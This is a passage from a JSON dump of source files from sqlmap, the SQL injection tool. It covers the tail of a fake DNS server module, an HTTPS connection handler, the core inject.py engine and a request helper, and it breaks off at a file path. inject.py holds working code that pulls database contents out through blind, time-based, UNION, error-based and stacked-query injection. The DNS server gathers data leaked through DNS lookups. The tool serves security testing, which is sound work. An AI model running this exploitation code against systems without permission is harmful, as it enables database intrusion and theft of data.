Pointer to domain name\n            retVal += b\"\\x00\\x01\"                                                           # Type A\n            retVal += b\"\\x00\\x01\"                                                           # Class IN\n            retVal += b\"\\x00\\x00\\x00\\x20\"                                                   # TTL (32 seconds)\n            retVal += b\"\\x00\\x04\"                                                           # Data length\n            retVal += b\"\".join(struct.pack('B', int(_)) for _ in resolution.split('.'))     # 4 bytes of IP\n\n        return retVal\n\nclass DNSServer(object):\n    \"\"\"\n    Used for making fake DNS resolution responses based on received\n    raw request\n\n    Reference(s):\n        https://code.activestate.com/recipes/491264-mini-fake-dns-server/\n        https://web.archive.org/web/20150418152405/https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py\n    \"\"\"\n\n    def __init__(self):\n        self._check_localhost()\n        self._requests = []\n        self._lock = threading.Lock()\n\n        try:\n            self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)\n        except AttributeError:\n            self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        self._socket.bind((\"\", 53))\n        self._running = False\n        self._initialized = False\n\n    def _check_localhost(self):\n        response = b\"\"\n\n        try:\n            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n            s.connect((\"\", 53))\n            s.send(binascii.unhexlify(\"6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000\"))  # A www.google.com\n            response = s.recv(512)\n        except:\n            pass\n        finally:\n            if response and b\"google\" in response:\n                raise socket.error(\"another DNS service already running on '0.0.0.0:53'\")\n\n    def pop(self, prefix=None, suffix=None):\n        \"\"\"\n        Returns received DNS resolution request (if any) that has given\n        prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)\n        \"\"\"\n\n        retVal = None\n\n        if prefix and hasattr(prefix, \"encode\"):\n            prefix = prefix.encode()\n\n        if suffix and hasattr(suffix, \"encode\"):\n            suffix = suffix.encode()\n\n        with self._lock:\n            for _ in self._requests:\n                if prefix is None and suffix is None or re.search(b\"%s\\\\..+\\\\.%s\" % (prefix, suffix), _, re.I):\n                    self._requests.remove(_)\n                    retVal = _.decode()\n                    break\n\n        return retVal\n\n    def run(self):\n        \"\"\"\n        Runs a DNSServer instance as a daemon thread (killed by program exit)\n        \"\"\"\n\n        def _():\n            try:\n                self._running = True\n                self._initialized = True\n\n                while True:\n                    data, addr = self._socket.recvfrom(1024)\n                    _ = DNSQuery(data)\n                    self._socket.sendto(_.response(\"127.0.0.1\"), addr)\n\n                    with self._lock:\n                        self._requests.append(_._query)\n\n            except KeyboardInterrupt:\n                raise\n\n            finally:\n                self._running = False\n\n        thread = threading.Thread(target=_)\n        thread.daemon = True\n        thread.start()\n\nif __name__ == \"__main__\":\n    server = None\n    try:\n        server = DNSServer()\n        server.run()\n\n        while not server._initialized:\n            time.sleep(0.1)\n\n        while server._running:\n            while True:\n                _ = server.pop()\n\n                if _ is None:\n                    break\n                else:\n                    print(\"[i] %s\" % _)\n\n            time.sleep(1)\n\n    except socket.error as ex:\n        if 'Permission' in str(ex):\n            print(\"[x] Please run with sudo/Administrator privileges\")\n        else:\n            raise\n    except KeyboardInterrupt:\n        os._exit(0)\n    finally:\n        if server:\n            server._running = False\n"
  },
  {
    "path": "sqlmap/lib/request/httpshandler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\nimport socket\n\nfrom lib.core.common import filterNone\nfrom lib.core.common import getSafeExString\nfrom lib.core.compat import LooseVersion\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.settings import PYVERSION\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import urllib as _urllib\n\nssl = None\ntry:\n    import ssl as _ssl\n    ssl = _ssl\nexcept ImportError:\n    pass\n\n_protocols = filterNone(getattr(ssl, _, None) for _ in (\"PROTOCOL_TLSv1_2\", \"PROTOCOL_TLSv1_1\", \"PROTOCOL_TLSv1\", \"PROTOCOL_SSLv3\", \"PROTOCOL_SSLv23\", \"PROTOCOL_SSLv2\"))\n_lut = dict((getattr(ssl, _), _) for _ in dir(ssl) if _.startswith(\"PROTOCOL_\"))\n_contexts = {}\n\nclass HTTPSConnection(_http_client.HTTPSConnection):\n    \"\"\"\n    Connection class that enables usage of newer SSL protocols.\n\n    Reference: http://bugs.python.org/msg128686\n\n    NOTE: use https://check-tls.akamaized.net/ to check if (e.g.) TLS/SNI is working properly\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        # NOTE: Dirty patch for https://bugs.python.org/issue38251 / https://github.com/sqlmapproject/sqlmap/issues/4158\n        if hasattr(ssl, \"_create_default_https_context\"):\n            if None not in _contexts:\n                _contexts[None] = ssl._create_default_https_context()\n            kwargs[\"context\"] = _contexts[None]\n\n        self.retrying = False\n\n        _http_client.HTTPSConnection.__init__(self, *args, **kwargs)\n\n    def connect(self):\n        def create_sock():\n            sock = socket.create_connection((self.host, self.port), self.timeout)\n            if getattr(self, \"_tunnel_host\", None):\n                self.sock = sock\n                self._tunnel()\n            return sock\n\n        success = False\n\n        # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext\n        #               https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni\n        if re.search(r\"\\A[\\d.]+\\Z\", self.host or \"\") is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, \"SSLContext\"):\n            for protocol in (_ for _ in _protocols if _ >= ssl.PROTOCOL_TLSv1):\n                try:\n                    sock = create_sock()\n                    if protocol not in _contexts:\n                        _contexts[protocol] = ssl.SSLContext(protocol)\n                        try:\n                            # Reference(s): https://askubuntu.com/a/1263098\n                            #               https://askubuntu.com/a/1250807\n                            _contexts[protocol].set_ciphers(\"DEFAULT@SECLEVEL=1\")\n                        except ssl.SSLError:\n                            pass\n                    result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host)\n                    if result:\n                        success = True\n                        self.sock = result\n                        _protocols.remove(protocol)\n                        _protocols.insert(0, protocol)\n                        break\n                    else:\n                        sock.close()\n                except (ssl.SSLError, socket.error, _http_client.BadStatusLine) as ex:\n                    self._tunnel_host = None\n                    logger.debug(\"SSL connection error occurred for '%s' ('%s')\" % (_lut[protocol], getSafeExString(ex)))\n\n            if kb.tlsSNI.get(self.host) is None:\n                kb.tlsSNI[self.host] = success\n\n        if not success:\n            for protocol in _protocols:\n                try:\n                    sock = create_sock()\n                    _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)\n                    if _:\n                        success = True\n                        self.sock = _\n                        _protocols.remove(protocol)\n                        _protocols.insert(0, protocol)\n                        break\n                    else:\n                        sock.close()\n                except (ssl.SSLError, socket.error, _http_client.BadStatusLine) as ex:\n                    self._tunnel_host = None\n                    logger.debug(\"SSL connection error occurred for '%s' ('%s')\" % (_lut[protocol], getSafeExString(ex)))\n\n        if not success:\n            errMsg = \"can't establish SSL connection\"\n            # Reference: https://docs.python.org/2/library/ssl.html\n            if LooseVersion(PYVERSION) < LooseVersion(\"2.7.9\"):\n                errMsg += \" (please retry with Python >= 2.7.9)\"\n\n            if kb.sslSuccess and not self.retrying:\n                self.retrying = True\n\n                for _ in xrange(conf.retries):\n                    try:\n                        self.connect()\n                    except SqlmapConnectionException:\n                        pass\n                    else:\n                        return\n\n            raise SqlmapConnectionException(errMsg)\n        else:\n            kb.sslSuccess = True\n\nclass HTTPSHandler(_urllib.request.HTTPSHandler):\n    def https_open(self, req):\n        return self.do_open(HTTPSConnection if ssl else _http_client.HTTPSConnection, req)\n"
  },
  {
    "path": "sqlmap/lib/request/inject.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport re\nimport time\n\nfrom lib.core.agent import agent\nfrom lib.core.bigarray import BigArray\nfrom lib.core.common import applyFunctionRecursively\nfrom lib.core.common import Backend\nfrom lib.core.common import calculateDeltaSeconds\nfrom lib.core.common import cleanQuery\nfrom lib.core.common import expandAsteriskForColumns\nfrom lib.core.common import extractExpectedValue\nfrom lib.core.common import filterNone\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getTechnique\nfrom lib.core.common import getTechniqueData\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import initTechnique\nfrom lib.core.common import isDigit\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import parseUnionPage\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import setTechnique\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.decorators import lockedmethod\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapNotVulnerableException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS\nfrom lib.core.settings import INFERENCE_MARKER\nfrom lib.core.settings import MAX_TECHNIQUES_PER_VALUE\nfrom lib.core.settings import SQL_SCALAR_REGEX\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.request.connect import Connect as Request\nfrom lib.request.direct import direct\nfrom lib.techniques.blind.inference import bisection\nfrom lib.techniques.blind.inference import queryOutputLength\nfrom lib.techniques.dns.test import dnsTest\nfrom lib.techniques.dns.use import dnsUse\nfrom lib.techniques.error.use import errorUse\nfrom lib.techniques.union.use import unionUse\nfrom thirdparty import six\n\ndef _goDns(payload, expression):\n    value = None\n\n    if conf.dnsDomain and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None:\n        if kb.dnsTest is None:\n            dnsTest(payload)\n\n        if kb.dnsTest:\n            value = dnsUse(payload, expression)\n\n    return value\n\ndef _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None):\n    start = time.time()\n    value = None\n    count = 0\n\n    value = _goDns(payload, expression)\n\n    if payload is None:\n        return None\n\n    if value is not None:\n        return value\n\n    timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))\n\n    if timeBasedCompare and conf.threads > 1 and kb.forceThreads is None:\n        msg = \"multi-threading is considered unsafe in \"\n        msg += \"time-based data retrieval. Are you sure \"\n        msg += \"of your choice (breaking warranty) [y/N] \"\n\n        kb.forceThreads = readInput(msg, default='N', boolean=True)\n\n    if not (timeBasedCompare and kb.dnsTest):\n        if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search(r\"(COUNT|LTRIM)\\(\", expression, re.I) and not (timeBasedCompare and not kb.forceThreads):\n\n            if field and re.search(r\"\\ASELECT\\s+DISTINCT\\((.+?)\\)\\s+FROM\", expression, re.I):\n                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CUBRID):\n                    alias = randomStr(lowercase=True, seed=hash(expression))\n                    expression = \"SELECT %s FROM (%s)\" % (field if '.' not in field else re.sub(r\".+\\.\", \"%s.\" % alias, field), expression)  # Note: MonetDB as a prime example\n                    expression += \" AS %s\" % alias\n                else:\n                    expression = \"SELECT %s FROM (%s)\" % (field, expression)\n\n            if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields or Backend.getIdentifiedDbms() in (DBMS.RAIMA,):\n                nulledCastedField = agent.nullAndCastField(field)\n                injExpression = expression.replace(field, nulledCastedField, 1)\n            else:\n                injExpression = expression\n            length = queryOutputLength(injExpression, payload)\n        else:\n            length = None\n\n        kb.inferenceMode = True\n        count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)\n        kb.inferenceMode = False\n\n        if not kb.bruteMode:\n            debugMsg = \"performed %d quer%s in %.2f seconds\" % (count, 'y' if count == 1 else \"ies\", calculateDeltaSeconds(start))\n            logger.debug(debugMsg)\n\n    return value\n\ndef _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False):\n    outputs = []\n    origExpr = None\n\n    for field in expressionFieldsList:\n        output = None\n\n        if field.startswith(\"ROWNUM \"):\n            continue\n\n        if isinstance(num, int):\n            origExpr = expression\n            expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])\n\n        if \"ROWNUM\" in expressionFieldsList:\n            expressionReplaced = expression\n        else:\n            expressionReplaced = expression.replace(expressionFields, field, 1)\n\n        output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)\n\n        if isinstance(num, int):\n            expression = origExpr\n\n        outputs.append(output)\n\n    return outputs\n\ndef _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False):\n    \"\"\"\n    Retrieve the output of a SQL query characted by character taking\n    advantage of an blind SQL injection vulnerability on the affected\n    parameter through a bisection algorithm.\n    \"\"\"\n\n    initTechnique(getTechnique())\n\n    query = agent.prefixQuery(getTechniqueData().vector)\n    query = agent.suffixQuery(query)\n    payload = agent.payload(newValue=query)\n    count = None\n    startLimit = 0\n    stopLimit = None\n    outputs = BigArray()\n\n    if not unpack:\n        return _goInference(payload, expression, charsetType, firstChar, lastChar, dump)\n\n    _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)\n\n    rdbRegExp = re.search(r\"RDB\\$GET_CONTEXT\\([^)]+\\)\", expression, re.I)\n    if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD):\n        expressionFieldsList = [expressionFields]\n\n    if len(expressionFieldsList) > 1:\n        infoMsg = \"the SQL query provided has more than one field. \"\n        infoMsg += \"sqlmap will now unpack it into distinct queries \"\n        infoMsg += \"to be able to retrieve the output even if we \"\n        infoMsg += \"are going blind\"\n        logger.info(infoMsg)\n\n    # If we have been here from SQL query/shell we have to check if\n    # the SQL query might return multiple entries and in such case\n    # forge the SQL limiting the query output one entry at a time\n    # NOTE: we assume that only queries that get data from a table\n    # can return multiple entries\n    if fromUser and \" FROM \" in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I) and hasattr(queries[Backend.getIdentifiedDbms()].limitregexp, \"query\"):\n        expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression)\n\n        if limitCond:\n            test = True\n\n            if not stopLimit or stopLimit <= 1:\n                if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]):\n                    test = False\n\n            if test:\n                # Count the number of SQL query entries output\n                countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]\n                countedExpression = expression.replace(expressionFields, countFirstField, 1)\n\n                if \" ORDER BY \" in countedExpression.upper():\n                    _ = countedExpression.upper().rindex(\" ORDER BY \")\n                    countedExpression = countedExpression[:_]\n\n                if not stopLimit:\n                    count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar)\n\n                    if isNumPosStrValue(count):\n                        count = int(count)\n\n                        if batch or count == 1:\n                            stopLimit = count\n                        else:\n                            message = \"the SQL query provided can return \"\n                            message += \"%d entries. How many \" % count\n                            message += \"entries do you want to retrieve?\\n\"\n                            message += \"[a] All (default)\\n[#] Specific number\\n\"\n                            message += \"[q] Quit\"\n                            choice = readInput(message, default='A').upper()\n\n                            if choice == 'A':\n                                stopLimit = count\n\n                            elif choice == 'Q':\n                                raise SqlmapUserQuitException\n\n                            elif isDigit(choice) and int(choice) > 0 and int(choice) <= count:\n                                stopLimit = int(choice)\n\n                                infoMsg = \"sqlmap is now going to retrieve the \"\n                                infoMsg += \"first %d query output entries\" % stopLimit\n                                logger.info(infoMsg)\n\n                            elif choice in ('#', 'S'):\n                                message = \"how many? \"\n                                stopLimit = readInput(message, default=\"10\")\n\n                                if not isDigit(stopLimit):\n                                    errMsg = \"invalid choice\"\n                                    logger.error(errMsg)\n\n                                    return None\n\n                                else:\n                                    stopLimit = int(stopLimit)\n\n                            else:\n                                errMsg = \"invalid choice\"\n                                logger.error(errMsg)\n\n                                return None\n\n                    elif count and not isDigit(count):\n                        warnMsg = \"it was not possible to count the number \"\n                        warnMsg += \"of entries for the SQL query provided. \"\n                        warnMsg += \"sqlmap will assume that it returns only \"\n                        warnMsg += \"one entry\"\n                        logger.warning(warnMsg)\n\n                        stopLimit = 1\n\n                    elif (not count or int(count) == 0):\n                        if not count:\n                            warnMsg = \"the SQL query provided does not \"\n                            warnMsg += \"return any output\"\n                            logger.warning(warnMsg)\n\n                        return None\n\n                elif (not stopLimit or stopLimit == 0):\n                    return None\n\n                try:\n                    try:\n                        for num in xrange(startLimit or 0, stopLimit or 0):\n                            output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)\n                            outputs.append(output)\n                    except OverflowError:\n                        errMsg = \"boundary limits (%d,%d) are too large. Please rerun \" % (startLimit, stopLimit)\n                        errMsg += \"with switch '--fresh-queries'\"\n                        raise SqlmapDataException(errMsg)\n\n                except KeyboardInterrupt:\n                    print()\n                    warnMsg = \"user aborted during dumping phase\"\n                    logger.warning(warnMsg)\n\n                return outputs\n\n    elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith(\"SELECT \") and \" FROM \" not in expression.upper():\n        expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]\n\n    outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)\n\n    return \", \".join(output or \"\" for output in outputs) if not isNoneValue(outputs) else None\n\ndef _goBooleanProxy(expression):\n    \"\"\"\n    Retrieve the output of a boolean based SQL query\n    \"\"\"\n\n    initTechnique(getTechnique())\n\n    if conf.dnsDomain:\n        query = agent.prefixQuery(getTechniqueData().vector)\n        query = agent.suffixQuery(query)\n        payload = agent.payload(newValue=query)\n        output = _goDns(payload, expression)\n\n        if output is not None:\n            return output\n\n    vector = getTechniqueData().vector\n    vector = vector.replace(INFERENCE_MARKER, expression)\n    query = agent.prefixQuery(vector)\n    query = agent.suffixQuery(query)\n    payload = agent.payload(newValue=query)\n\n    timeBasedCompare = getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)\n\n    output = hashDBRetrieve(expression, checkConf=True)\n\n    if output is None:\n        output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False)\n\n        if output is not None:\n            hashDBWrite(expression, output)\n\n    return output\n\ndef _goUnion(expression, unpack=True, dump=False):\n    \"\"\"\n    Retrieve the output of a SQL query taking advantage of an union SQL\n    injection vulnerability on the affected parameter.\n    \"\"\"\n\n    output = unionUse(expression, unpack=unpack, dump=dump)\n\n    if isinstance(output, six.string_types):\n        output = parseUnionPage(output)\n\n    return output\n\n@lockedmethod\n@stackedmethod\ndef getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):\n    \"\"\"\n    Called each time sqlmap inject a SQL query on the SQL injection\n    affected parameter.\n    \"\"\"\n\n    if conf.hexConvert and expected != EXPECTED.BOOL and Backend.getIdentifiedDbms():\n        if not hasattr(queries[Backend.getIdentifiedDbms()], \"hex\"):\n            warnMsg = \"switch '--hex' is currently not supported on DBMS %s\" % Backend.getIdentifiedDbms()\n            singleTimeWarnMessage(warnMsg)\n            conf.hexConvert = False\n        else:\n            charsetType = CHARSET_TYPE.HEXADECIMAL\n\n    kb.safeCharEncode = safeCharEncode\n    kb.resumeValues = resumeValue\n\n    for keyword in GET_VALUE_UPPERCASE_KEYWORDS:\n        expression = re.sub(r\"(?i)(\\A|\\(|\\)|\\s)%s(\\Z|\\(|\\)|\\s)\" % keyword, r\"\\g<1>%s\\g<2>\" % keyword, expression)\n\n    if suppressOutput is not None:\n        pushValue(getCurrentThreadData().disableStdOut)\n        getCurrentThreadData().disableStdOut = suppressOutput\n\n    try:\n        pushValue(conf.db)\n        pushValue(conf.tbl)\n\n        if expected == EXPECTED.BOOL:\n            forgeCaseExpression = booleanExpression = expression\n\n            if expression.startswith(\"SELECT \"):\n                booleanExpression = \"(%s)=%s\" % (booleanExpression, \"'1'\" if \"'1'\" in booleanExpression else \"1\")\n            else:\n                forgeCaseExpression = agent.forgeCaseStatement(expression)\n\n        if conf.direct:\n            value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression)\n\n        elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)):\n            query = cleanQuery(expression)\n            query = expandAsteriskForColumns(query)\n            value = None\n            found = False\n            count = 0\n\n            if query and not re.search(r\"COUNT.*FROM.*\\(.*DISTINCT\", query, re.I):\n                query = query.replace(\"DISTINCT \", \"\")\n\n            if not conf.forceDns:\n                if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):\n                    setTechnique(PAYLOAD.TECHNIQUE.UNION)\n                    kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]\n                    fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion\n\n                    if expected == EXPECTED.BOOL:\n                        # Note: some DBMSes (e.g. Altibase) don't support implicit conversion of boolean check result during concatenation with prefix and suffix (e.g. 'qjjvq'||(1=1)||'qbbbq')\n\n                        if not any(_ in forgeCaseExpression for _ in (\"SELECT\", \"CASE\")):\n                            forgeCaseExpression = \"(CASE WHEN (%s) THEN '1' ELSE '0' END)\" % forgeCaseExpression\n\n                    try:\n                        value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)\n                    except SqlmapConnectionException:\n                        if not fallback:\n                            raise\n\n                    count += 1\n                    found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE\n\n                    if not found and fallback:\n                        warnMsg = \"something went wrong with full UNION \"\n                        warnMsg += \"technique (could be because of \"\n                        warnMsg += \"limitation on retrieved number of entries)\"\n                        if \" FROM \" in query.upper():\n                            warnMsg += \". Falling back to partial UNION technique\"\n                            singleTimeWarnMessage(warnMsg)\n\n                            try:\n                                pushValue(kb.forcePartialUnion)\n                                kb.forcePartialUnion = True\n                                value = _goUnion(query, unpack, dump)\n                                found = (value is not None) or (value is None and expectingNone)\n                            finally:\n                                kb.forcePartialUnion = popValue()\n                        else:\n                            singleTimeWarnMessage(warnMsg)\n\n                if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found:\n                    setTechnique(PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY)\n                    value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump)\n                    count += 1\n                    found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE\n\n                if found and conf.dnsDomain:\n                    _ = \"\".join(filterNone(key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items()))\n                    warnMsg = \"option '--dns-domain' will be ignored \"\n                    warnMsg += \"as faster techniques are usable \"\n                    warnMsg += \"(%s) \" % _\n                    singleTimeWarnMessage(warnMsg)\n\n            if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found:\n                setTechnique(PAYLOAD.TECHNIQUE.BOOLEAN)\n\n                if expected == EXPECTED.BOOL:\n                    value = _goBooleanProxy(booleanExpression)\n                else:\n                    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)\n\n                count += 1\n                found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE\n\n            if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found:\n                match = re.search(r\"\\bFROM\\b ([^ ]+).+ORDER BY ([^ ]+)\", expression)\n                kb.responseTimeMode = \"%s|%s\" % (match.group(1), match.group(2)) if match else None\n\n                if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME):\n                    setTechnique(PAYLOAD.TECHNIQUE.TIME)\n                else:\n                    setTechnique(PAYLOAD.TECHNIQUE.STACKED)\n\n                if expected == EXPECTED.BOOL:\n                    value = _goBooleanProxy(booleanExpression)\n                else:\n                    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)\n        else:\n            errMsg = \"none of the injection types identified can be \"\n            errMsg += \"leveraged to retrieve queries output\"\n            raise SqlmapNotVulnerableException(errMsg)\n\n    finally:\n        kb.resumeValues = True\n        kb.responseTimeMode = None\n\n        conf.tbl = popValue()\n        conf.db = popValue()\n\n        if suppressOutput is not None:\n            getCurrentThreadData().disableStdOut = popValue()\n\n    kb.safeCharEncode = False\n\n    if not any((kb.testMode, conf.dummy, conf.offline, conf.noCast, conf.hexConvert)) and value is None and Backend.getDbms() and conf.dbmsHandler and kb.fingerprinted:\n        warnMsg = \"in case of continuous data retrieval problems you are advised to try \"\n        warnMsg += \"a switch '--no-cast' \"\n        warnMsg += \"or switch '--hex'\" if hasattr(queries[Backend.getIdentifiedDbms()], \"hex\") else \"\"\n        singleTimeWarnMessage(warnMsg)\n\n    # Dirty patch (MSSQL --binary-fields with 0x31003200...)\n    if Backend.isDbms(DBMS.MSSQL) and conf.binaryFields:\n        def _(value):\n            if isinstance(value, six.text_type):\n                if value.startswith(u\"0x\"):\n                    value = value[2:]\n                    if value and len(value) % 4 == 0:\n                        candidate = \"\"\n                        for i in xrange(len(value)):\n                            if i % 4 < 2:\n                                candidate += value[i]\n                            elif value[i] != '0':\n                                candidate = None\n                                break\n                        if candidate:\n                            value = candidate\n            return value\n\n        value = applyFunctionRecursively(value, _)\n\n    # Dirty patch (safe-encoded unicode characters)\n    if isinstance(value, six.text_type) and \"\\\\x\" in value:\n        try:\n            candidate = eval(repr(value).replace(\"\\\\\\\\x\", \"\\\\x\").replace(\"u'\", \"'\", 1)).decode(conf.encoding or UNICODE_ENCODING)\n            if \"\\\\x\" not in candidate:\n                value = candidate\n        except:\n            pass\n\n    return extractExpectedValue(value, expected)\n\ndef goStacked(expression, silent=False):\n    if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data:\n        setTechnique(PAYLOAD.TECHNIQUE.STACKED)\n    else:\n        for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True):\n            _ = getTechniqueData(technique)\n            if _ and \"stacked\" in _[\"title\"].lower():\n                setTechnique(technique)\n                break\n\n    expression = cleanQuery(expression)\n\n    if conf.direct:\n        return direct(expression)\n\n    query = agent.prefixQuery(\";%s\" % expression)\n    query = agent.suffixQuery(query)\n    payload = agent.payload(newValue=query)\n    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=\"SELECT\" in (payload or \"\").upper())\n\ndef checkBooleanExpression(expression, expectingNone=True):\n    return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)\n"
  },
  {
    "path": "sqlmap/lib/request/methodrequest.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getText\nfrom thirdparty.six.moves import urllib as _urllib\n\nclass MethodRequest(_urllib.request.Request):\n    \"\"\"\n    Used to create HEAD/PUT/DELETE/... requests with urllib\n    \"\"\"\n\n    def set_method(self, method):\n        self.method = getText(method.upper())  # Dirty hack for Python3 (may it rot in hell!)\n\n    def get_method(self):\n        return getattr(self, 'method', _urllib.request.Request.get_method(self))\n"
  },
  {
    "path": "sqlmap/lib/request/pkihandler.py",
